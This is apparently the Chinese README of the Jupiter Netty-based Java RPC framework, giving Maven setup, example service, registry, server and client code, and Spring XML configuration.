*   小数据包请求(不带业务)在四核刀片服务器上可达到17w+的tps, 详情见 Benchmark
*   参考: 多个 RPC 框架的 Benchmark 见这里

**文档:**

*   High performance RPC with netty
*   High performance RPC with netty.pdf
*   Wiki
*   其他文档
*   发展路线

**一次 RPC 调用:**

感谢 @远墨 提供的图

**快速开始:****工程依赖:**

*   JDK1.8 或更高版本
*   依赖管理工具: Maven3.x 版本

**最新版本OSS下载****最新版本Maven中心仓库下载****Maven依赖:**

<dependency\>
    <groupId\>org.jupiter-rpc</groupId\>
    <artifactId\>jupiter-all</artifactId\>
    <version\>${jupiter.version}</version\>
</dependency\>

**简单调用示例:****1\. 创建服务接口:**

@ServiceProvider(group = "test", name = "serviceTest")
public interface ServiceTest {
    String sayHelloString();
}

@ServiceProvider:
    - 建议每个服务接口通过此注解来指定服务信息, 如不希望业务代码对jupiter依赖也可以不使用此注解而手动去设置服务信息
        + group: 服务组别(选填, 默认组别为'Jupiter')
        + name: 服务名称(选填, 默认名称为接口全限定名称)

**2\. 创建服务实现:**

@ServiceProviderImpl(version = "1.0.0")
public class ServiceTestImpl implements ServiceTest {

    @Override
    public String sayHelloString() {
        return "Hello jupiter";
    }
}

@ServiceProviderImpl:
    - 建议每个服务实现通过此注解来指定服务版本信息, 如不希望业务代码对jupiter依赖也可以不使用此注解而手动去设置版本信息
        + version: 服务版本号(选填, 默认版本号为'1.0.0')

**3\. 启动注册中心:****\- 选择1: 使用 jupiter 默认的注册中心:**

public class HelloJupiterRegistryServer {

    public static void main(String\[\] args) {
        // 注册中心
        RegistryServer registryServer = RegistryServer.Default.createRegistryServer(20001, 1);
        try {
            registryServer.startRegistryServer();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    }
}

**\- 选择2: 使用 zookeeper 作为注册中心:**

默认注册中心只建议在测试环境使用, 线上建议使用 zookeeper 实现

// 设置使用 zookeeper 作为注册中心
JServer server = new DefaultServer(RegistryService.RegistryType.ZOOKEEPER)
JClient client = new DefaultClient(RegistryService.RegistryType.ZOOKEEPER)

在 server 和 client 中配置 jupiter-registry-zookeeper 依赖(jupiter-all 包含 jupiter-registry-zookeeper)

<dependency\>
    <groupId\>org.jupiter-rpc</groupId\>
    <artifactId\>jupiter-registry-zookeeper</artifactId\>
    <version\>${jupiter.version}</version\>
</dependency\>

**4\. 启动服务提供(Server):**

public class HelloJupiterServer {

    public static void main(String\[\] args) throws Exception {
        JServer server = new DefaultServer().withAcceptor(new JNettyTcpAcceptor(18090));
        // provider
        ServiceTestImpl service = new ServiceTestImpl();
        // 本地注册
        ServiceWrapper provider = server.serviceRegistry()
                .provider(service)
                .register();
        // 连接注册中心
        server.connectToRegistryServer("127.0.0.1:20001");
        // 向注册中心发布服务
        server.publish(provider);
        // 启动server
        server.start();
    }
}

**5\. 启动服务消费者(Client)**

public class HelloJupiterClient {

    public static void main(String\[\] args) {
        JClient client = new DefaultClient().withConnector(new JNettyTcpConnector());
        // 连接RegistryServer
        client.connectToRegistryServer("127.0.0.1:20001");
        // 自动管理可用连接
        JConnector.ConnectionWatcher watcher = client.watchConnections(ServiceTest.class);
        // 等待连接可用
        if (!watcher.waitForAvailable(3000)) {
            throw new ConnectFailedException();
        }

        ServiceTest service = ProxyFactory.factory(ServiceTest.class)
                .version("1.0.0")
                .client(client)
                .newProxyInstance();

        service.sayHelloString();
    }
}

Server/Client 代码示例

**新特性**

v1.3 新增 InvokeType.AUTO, 当你的接口返回值是一个 CompletableFuture 或者它的子类将自动适配为异步调用, 否则为同步调用 具体 demo 请参考这里

**结合Spring使用示例:****1\. Server端配置:**

<jupiter:server id\="jupiterServer" registryType\="default"\> 
    <jupiter:property registryServerAddresses\="127.0.0.1:20001" />
</jupiter:server\>


<bean id\="serviceTest" class\="org.jupiter.example.ServiceTestImpl" />

<jupiter:provider id\="serviceTestProvider" server\="jupiterServer" providerImpl\="serviceTest"\>
    <jupiter:property weight\="100"/>
</jupiter:provider\>

**2\. Client 端配置:**

<jupiter:client id\="jupiterClient" registryType\="default"\> 
    <jupiter:property registryServerAddresses\="127.0.0.1:20001" />
</jupiter:client\>


<jupiter:consumer id\="serviceTest" client\="jupiterClient" interfaceClass\="org.jupiter.example.ServiceTest"\>
    <jupiter:property version\="1.0.0.daily" />
    <jupiter:property serializerType\="proto\_stuff" />
    <jupiter:property loadBalancerType\="round\_robin" />
    <jupiter:property timeoutMillis\="3000" />
    <jupiter:property clusterStrategy\="fail\_over" />
    <jupiter:property failoverRetries\="2" />
    <jupiter:methodSpecials\>
        
        <jupiter:methodSpecial methodName\="sayHello" timeoutMillis\="5000" clusterStrategy\="fail\_fast" />
    </jupiter:methodSpecials\>
</jupiter:consumer\>

SpringServer/SpringClient 代码示例

**更多示例代码****其他**

*   qq交流群: 397633380
*   邮件交流: jiachun\_fjc@163.com

Tag

#git